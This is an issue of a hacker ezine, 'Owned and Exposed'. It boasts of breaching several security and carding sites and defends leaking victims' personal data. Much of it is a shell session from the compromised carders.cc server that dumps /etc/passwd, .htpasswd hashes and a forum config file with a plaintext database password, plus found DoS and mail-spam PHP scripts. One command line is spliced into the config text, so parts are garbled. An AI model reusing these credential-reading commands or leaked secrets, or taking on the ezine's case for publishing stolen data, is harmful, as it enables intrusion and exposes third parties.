Copy Link
Add to Bookmark
Report

Owned and Exposed issue 02

eZine's profile picture
Published in 
Owned and Exposed
 · 4 years ago

  

|\___/|
-=[ISSUE - NO 2]=- =) ^Y^ (=
-=[OF]=- \ ^ /
)=*=(
______________________________ __ ____________ _ / \
|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | |
|| _ | | | | | -__| _ | | . | | . || /| | | |\
||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\
| | | ______ |__//_// ___/ __
| | | .-----.--.--.-----.| |.-----.--\_).--| ||
| | | | -__|_ _| _ || || ||__ --| -__| _ ||
| | | |_____|__.__| __|| || ||_____|_____|_____||
|_/ \__________________________|__|___| || |___________________|
|______|
------------------------.++-
/ y-
/ y-
---------------------/ s/----------------------.++-
/ ys+-. |\ / y-
---------------\.../ /\ ys------/()/ / y-
sy \/ /'''\ \| / s/-
------------------+-++s /-----' / s+-.
---------------------/s /-------------\.../ /\ ys
-y s sy \/ /'''\
-----------------------y s---------------------++s /-----'
----------------------++' |\ /s /
-------------------------------------/()/ -y ys
\| -y s
-------------------------------------------------++'
|_______________
,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \
~ Featuring ~ | ettercap \
_______________| |___________________\
/´ exploit-db | !
/ backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._,
/ free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
/___________________| ~ and ~
!

Out of the Blue
into the Black
,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ INTRO ~ !

Greetings followers, welcome to the second issue of owned and exp0sed.
This file is encoded with UTF-8, so to view it properly use unicode.

For those who are reading and laughing with us:
We (your happy ninjas) wish you a

,
_/^\_
< hax >
/.-.\
* MERRY * `/&\`
,@.*;@,
/_o.I %_\
(`'--:o(_@;
/`;--.,__ `')
;@`o % O,*`'`&\
(`'--)_@ ;o %'()\
* NINJA * /`;--._`''--._O'@;
/&*,()~o`;-.,_ `""`)
/`,@ ;+& () o*`;-';\
(`""--.,_0 +% @' &()\
/-.,_ ``''--....-'`)
/@%;o`:;'--,.__ __.'\
;*,&(); @ % &^;~`"`o;@();
* HAXMAS * /(); o^~; & ().o@*&`;&%O\
`"
="==""==,,,.,="=="==="`
__.----.(\-''#####---...___...-----._
'` \)_`"""""`
.--' `)
o( )_-\
`"""
` `

After our first release we got wind of some strange rumours. So just
to be sure, we need to clarify some facts.

So, who are we? First, lets talk about some things we are not. We are
not an underground rival kiddy group. We are not a cyber mafia gang.
We are the watchmen, the hackers who quietly observe the scene. If any
skiddy community gets too big, we shut them down. If any lamer causes
too much trouble, we shut them down. If any group keeps fucking stuff
up, we stop them.

So, why are we doing this? Some people say that being a vigilanty is
wrong and that we are actually criminals. What can we say? This may be
true. But the way we see it, if your not part of the solution, your
part of the fucking problem. These idiots spread garbage across our
scene and that is why they got owned. We take pride in what is left of
the scene and we have serious problems with those who rape it.

That's why we do what MUST be done.

There are some things left we would like to say about carders.cc.
First of all, they came back online after they got rm'ed. In the first
issue we gave our word that we would make sure carders.cc would never
come back. Well, we delivered on that promise in this issue. And as
such carders.cc has once again been eliminated. Maybe this time they
will get the hint.

Also, Heise Security said that we were a rival group trying to
capitalize on the demise of carders.cc. Apparently they weren't happy
about our disclosure of the carders.cc database that included the
personal information of carders.cc victims. What Heise forgot was that
with this action, all the victims of carders.cc got the chance to
realize that they were victims of fraud. You can try to say that our
disclosure of the database put them at even greater risk of fraud but
we disagree. What is more risky? Having your information secretly on
an "underground" carding forum where it WILL be sold and used in
frauduelent activity? Or, having it released so that you can be
notified and take the appropriate action to mitigate the damage that
has been done? I know which option I'd rather have.

It is quite impressive how many people wrote about the Carders Hack
without even bothering to read the zine. It is hilarious to see how
the media works. Somebody writes an article, others copy information
from it, others copy from it again. If we take a shit in a bowl. Then
you eat that shit and puke it back into a different bowl for someone
else to eat then they do the same thing, what do you have? "Two
Journo's One Cup"
is what you have. Fucking pathetic.

On the other hand, we'd like to thank Brian Krebs. Even if some of his
conclusions were way off the mark, he was still the first one to
report about carders.cc and nearly every other article was based on
Brian's work. At least you didn't eat shit and regurgitate it like the
rest Brian, keep up the good work.

Enough jibber jabber, let's get to business. You will soon realize
that our targets vary:

We owned ettercap because we were tired of people firing that shit up
and pretending to be a l33th4x0r sheep who think they are the greatest
hackerz with their ARP spoofing toolkitz.. If you have installed
ettercap in the last 5 years you may want to check yo shit (;p).

We owned offsec including backtrack and exploit-db because they are
fucking security "expert" maggots (oops s/m/f/) who just fail so hard
at security that we wonder why people really take their training
courses. We imagine it's like open mic night at the laughatorium.

We owned inj3ct0r because they are lameass wannabe milw0rm kids whose
sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake
anyone?).

We owned carders.cc (AGAIN) because they are unable to learn from
their mistakes and keep spreading garbage around the underground.

We owned free-hack because they are developing into one of the
largest, most arrogant script-kiddie breeding grounds on the
intertubez.

,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ carders.cc ~ !

Here we go again. We hope that everybody was looking forward to see
carders.cc getting owned again. We kept our word, didn't we? Let us
begin:
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| The ninja guys piss on you and your half trained monkeys or |
| whatever your leet underground team consists of. If you continue, |
| you will be owned over again and rm'd twice. Also we will punch |
| you in the face. |
|____________________________________________________________________|

Our lazy ninja squad was too drunk to come over and punch you in the
fucking face. So we'll just stick to owning you for now. Carders.cc
went down for a few days, but came back as if nothing had happened.
They switched some server admins and installed some new software in
the hopes that they would be safe. They turned on some l33t "security"
settings like PHP's "Safe Mode" and "Openbase Dir", and they also
disabled lots of functions. All in all they thought they were pretty
locked down. Well, obviously they were fucking wrong. It's hard to
harden a system when everything is backdoored and unfortunately we are
just too ninja to get stopped by your silly protections. You can never
stop us. We will always keep owning and exp0sing you.

No. Matter. What. You. Try.

$ uname -a
FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

$ id
uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc)

$ w
1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54
USER TTY FROM LOGIN@ IDLE WHAT

$ alias ls="ls -la"

$ ls

total 47
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var

$ cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin
cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin

$ cd /root

$ ls
total 412628
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw------- 1 root wheel 2909 Dec 7 22:31 .history
-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login
-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst
-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login
drwx------ 3 root wheel 512 Dec 6 02:34 .mc
-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
drwx------ 2 root wheel 512 Nov 7 17:20 .ssh
-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql
drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup
drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups
drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack
-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip
-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php
-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php
drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql
-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php
-rw------- 1 root wheel 16877 Jul 29 20:44 mbox
drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php
drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c
-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz
drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup

Mad PHP-Codez again!

$ cat ddos.php
<?php
while(1==1) {
$fp = fsockopen("92.241.190.202", 80, $errno, $errstr, 30);
}
?>

$ cat info.php
<?php
phpinfo();
?>

$ cat example.php
<?php
pcntl_fork();
pcntl_fork();
pcntl_fork();
pcntl_fork();

for ($i=0; $i<10; $i++) {
echo ".";
mail("jeka@2x4.ru","spammtest","this is a very big message...");
}
?>

$ cd /home/carderscc

$ ls
total 18
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc
drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc
drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma
drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp
drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo

$ cd carders.cc

$ ls
total 2286
dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 .
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess
-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd
dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp
-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php
-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php
-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php
dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive
-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php
-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php
-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php
-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php
-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php
-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php
-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif
dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript
-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php
dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles
-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php
-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php
dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars
dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics
-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php
-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php
-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php
-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php
-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php
-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico
-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php
-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php
-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php
-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php
-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php
-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php
-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php
dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images
dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes
-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php
-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php
-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php
-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php
-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php
-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php
-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php
-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php
-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php
-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php
-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php
-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php
-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp
-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php
-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php
-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php
-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php
dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp
-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php
-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php
-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php
-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php
-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php
-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php
dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages
-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php
-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php
-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php
-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php
-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php
-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php
-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php
-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php
-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php
-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php
-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php
-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php
-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php
-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php
-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php
-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php
-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php
-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php
-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php
dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics
dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap
-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php
-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php
-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php
-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php
-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif
-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php
-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php
-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php
dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb
dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo
-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php
-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php
-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php
-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php
-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php

$ cat .htpasswd
ddos:XScRLnTwdeJ6k

$ cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.3 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/


/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/


// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'carderscc_01';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'dbmaster@example.com';

// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put herecat ddos.php




, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'carderscc_01';
$config['MasterServer']['password'] = 'VGZU76f3zgugdew&5gd3ugz&gd3uzguzg$dh3jgduzgdUGZDufe76g3d';

// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';

// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '4835,9816';

// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '4835,9816';

// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '4835,9816';

// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '4835,9816';

// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/


// ****** The following options are only needed in special cases ******

// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
$config['Mysqli']['charset'] = 'latin1';

// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '/etc/my.cnf';

// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/


$ cd ..

$ cd jabber.carders.cc

$ ls
total 812
drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 .
drwxr-x--- 7 carderscc www 512 Nov 18 20:45 ..
-rwxrwxr-x 1 carderscc www 7948 Apr 28 2008 AC_OETags.js
-rwxrwxr-x 1 carderscc www 629979 Apr 28 2008 SparkWeb.swf
-rw-r--r-- 1 carderscc www 128693 Dec 2 00:34 c100.txt
-rwxrwxr-x 1 carderscc www 3638 Apr 28 2008 favicon.ico
-rwxrwxr-x 1 carderscc www 1272 Apr 28 2008 history.htm
-rwxrwxr-x 1 carderscc www 1292 Apr 28 2008 history.js
-rwxrwxr-x 1 carderscc www 2656 Apr 28 2008 history.swf
-rwxrwxr-x 1 carderscc www 14590 Jun 30 16:00 index.html
-rwxrwxr-x 1 carderscc www 2518 Apr 28 2008 osxmousewheel.js
-rwxrwxr-x 1 carderscc www 657 Apr 28 2008 playerProductInstall.swf

$ cd pma

$ cat .htpasswd
admin:0VisONWLe5DJE

$ cd /

$ls
total 47
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .
drwxr-xr-x 17 root wheel 512 Jul 3 19:12 ..
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT
-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a
drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin
drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot
dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev
drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc
drwxr-x--x 4 root wheel 512 Nov 1 23:54 home
drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib
drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec
drwxr-xr-x 2 root wheel 512 Jan 18 2010 media
drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt
dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc
drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root
drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin
lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys
drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp
drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr
drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var

?>

$ cd /home/cardersblog

$ ls
total 8
drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .
drwxr-x--x 4 root wheel 512 Nov 1 23:54 ..
